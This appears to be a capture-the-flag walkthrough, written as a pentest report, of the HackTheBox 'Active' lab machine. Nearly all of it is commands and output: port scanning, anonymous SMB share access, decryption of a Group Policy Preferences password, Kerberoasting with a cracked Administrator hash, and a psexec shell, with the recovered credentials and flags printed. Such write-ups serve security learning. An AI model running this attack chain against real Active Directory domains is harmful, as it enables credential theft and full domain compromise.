This report documents the complete penetration testing engagement against the Active machine from HackTheBox. The assessment revealed critical security vulnerabilities in an Active Directory environment, leading to complete domain compromise through improper Group Policy Preferences configuration and Kerberoasting attacks.
Key Findings:
# Set target IP
export target=10.129.24.27
# Comprehensive port scan
sudo nmap -p- --min-rate 1000 -sT -vvv $target
# Service version detection
sudo nmap -sC -sV -p 53,88,135,139,445,464,539,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49162,49167,49168 -T4 $target
Port Scan Results:
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
464/tcp open kpasswd5?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
Domain Identified: active.htb
# SMB share enumeration
smbmap -H 10.129.24.27 2>/dev/null
SMB Share Discovery:
# Anonymous access to Replication share
smbclient -N -U ""%"" //10.129.24.27/Replication
# Download all files recursively
smb: \> prompt OFF
smb: \> recurse ON
smb: \> mget *
Critical Finding - Groups.xml:
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
name="active.htb\SVC_TGS"
image="2"
changed="2018-07-18 20:46:06"
uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U"
newName=""
fullName=""
description=""
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
changeLogon="0"
noChange="1"
neverExpires="1"
acctDisabled="0"
userName="active.htb\SVC_TGS"/>
</User>
</Groups>
# Decrypt GPP password
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
Credentials Obtained:
SVC_TGSGPPstillStandingStrong2k18# Enumerate SMB shares with credentials
smbmap -H 10.129.24.27 -u SVC_TGS -p 'GPPstillStandingStrong2k18'
# Access Users share
smbclient -U "SVC_TGS"%"GPPstillStandingStrong2k18" //10.129.24.27/Users
# Retrieve user flag
smb: \SVC_TGS\Desktop\> get user.txt
User Flag: afdcbeca784c889a660b269080541380
# Check for Kerberoastable accounts
impacket-GetUserSPNs -request -dc-ip 10.129.24.27 active.htb/SVC_TGS:'GPPstillStandingStrong2k18'
Administrator TGS Ticket Obtained:
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c82cd09a6fcddc71588a1d634f4786ba$2c160ea2bdf1ff1f3b303b010d31f1a23cac9a48a67f5472f9fb4f8462be68bace41e6d3d9bdfe976c318207f2b909ad465503476d1ff7092ebfcd3034d1a5ce623b388017db00c108145334c4b81535c1bc9c4461a08c6a0fa27c7763fd68ba7e5d6481996e8e26f42a5c9f9600ecb72adf3c522236bffef59fcb4f132bf76ef02415dcccde16301cef4223fb21254c312dbf4a3a97dad1334bc12a13f18bd68401ff8b8ac4ae087898c40badeec28ad4dac1eb4e2ea90def268d038a8e7852b8fb38892db8cfe9e631d4663ebde24e974ba6746b696dcc59ef8461dd6a27daa4fb06bf902f580258e70eb2501e93081a6663ce93db406fe686a15db6d76f98ae4375af7c5460052921ba8d855f7b2054ca6e78a8f174d81918d68962fb312d439b864985aa43b7eae00833f41ce1a6b8c1d7bc1c4d22e55679aaf7621df76b1742aaa6bb5fd6ca7af193847f6f09da6ef92cf2fbff7152edf5e45934401708288d0534e3b64f007a3a7cbd6ed774f68f19ea23fd390fe345f7262e43ebd7dbb04865115ef4fbd5c09dfb758ac73aa86cbfa5896780f5977aa856fbd247f1e08e105d4c0b9c7c0874a2c22d927653b78d5dd1651808622e9e2900fa20675331e9e08db7d3f0eab3409afc13aa2cdf47f0ec9c0dec126f3db8b1f9be21ad4ec456dfd38efd28174c253ac82ec1ece3287ab2687562f23bc3c7b76bcc2263bc127217735ba75b07895df69047d8992a9f689e15491f273bd954fe85431a7b60dbfe528a2fd74abd8cacfd289fd4607f00e67e5b33de3b281297336ead888465222f7f069e2463dc85401d1be50a58d41988ba6194247d876b80cb2acbfc319509d5cabb72dfcd338f4a1126987c694d586523c1fc9f04f39bd09823dd2ee3d4ff99ea8de0c3484ebc62de5c9642743a55d417bbc5b94d65c8a05596b4aeaa0880f41cd615bc115fadf2a86411569760ebe4152bca87dff9bab9f55d777afcfda21ec71a3dc67f9870ec953243f1e92af8e1830ef22ac11ec85e9f821fc9abcb64262fbffc3da78e49479425c66fdeec6026bbca26ac87f665b1fd0d91e6c919f8b162dbbb52d57534bc9bfaa58faa377fc895efe6971f63ceaf2dcd57c6a4ce2fbee16a0cc6b04b93807def450cf6942bcab0f243c57ad62f95f35bc3995e487a43f0f9cdd1840dc650af8ac715275a7ff376894089671a530460d8af72a14b9462ce01e5bf979885044410c8d528de54229f9d8b5f09970c57f9
# Crack the Kerberoasted hash
hashcat -m 13100 -a 0 hash /usr/share/wordlists/rockyou.txt
Cracked Administrator Password: Ticketmaster1968
# Gain administrative shell
impacket-psexec active.htb/Administrator:'Ticketmaster1968'@10.129.24.27
C:\Users\Administrator\Desktop> type root.txt
Root Flag: 53e0fb9c6137970df9354ca30232429f
This report is for educational purposes only. Always ensure you have proper authorization before conducting security assessments.